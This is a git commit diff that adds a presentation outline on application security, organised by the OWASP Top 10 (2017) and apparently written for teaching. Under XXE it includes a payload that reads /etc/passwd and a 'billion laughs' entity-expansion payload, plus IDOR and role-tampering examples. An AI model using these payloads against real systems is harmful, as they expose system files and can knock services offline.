author | marcinzelent <zelent.marcin@gmail.com> | 2018-06-18 18:31:35 +0200 |
---|---|---|
committer | marcinzelent <zelent.marcin@gmail.com> | 2018-06-18 18:31:35 +0200 |
commit | 6f1cf11203f36c627fb60269d3547a1660d88c8d (patch) | |
tree | 9a5f541efed21b8dff942754caedd8e0cba4780f | |
parent | b0cf064f819357feedc77d6d5eb0de49e122554a (diff) |
Added presentation
-rw-r--r-- | presentation.txt | 68 |
1 files changed, 68 insertions, 0 deletions
diff --git a/presentation.txt b/presentation.txt
new file mode 100644
index 0000000..22e4ded
--- /dev/null
+++ b/presentation.txt
@@ -0,0 +1,68 @@
+Application security
+
+What is application security and why is it important?
+
+Most common application vulnerabilities (OWASP TOP 10)
+
+A1:2017 - Injection
+
+A2:2017 - Broken Authentication
+
+A3:2017 - Sensitive Data Exposure
+
+A4:2017 - XML External Entities (XXE)
+
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE foo [
+ <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<foo>&xxe;</foo>
+
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+ <!ENTITY lol "lol">
+ <!ELEMENT lolz (#PCDATA)>
+ <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+ <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
+ <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+ <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
+ <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
+ <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
+ <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
+ <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
+ <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
+]>
+<lolz>&lol9;</lolz>
+
+
+A5:2017 - Broken Access Control
+
+https://www.website.com/userpage.aspx?id=12
+
+A6:2017 - Security Misconfiguration
+
+A7:2017 - Cross-Site Scripting (XSS)
+
+A8:2017 - Insecure Deserialization
+
+{
+ "id":123,
+ "name":"john",
+ "role":"user"
+}
+
+{
+ "id":1,
+ "name":"admin",
+ "role":"admin"
+}
+
+A9:2017 - Using Components with Known Vulnerabilities
+
+A10:2017 - Insufficient Logging & Monitoring
+
+Buffer overflow
+
+BONUS
+
+Thank you for your attention. |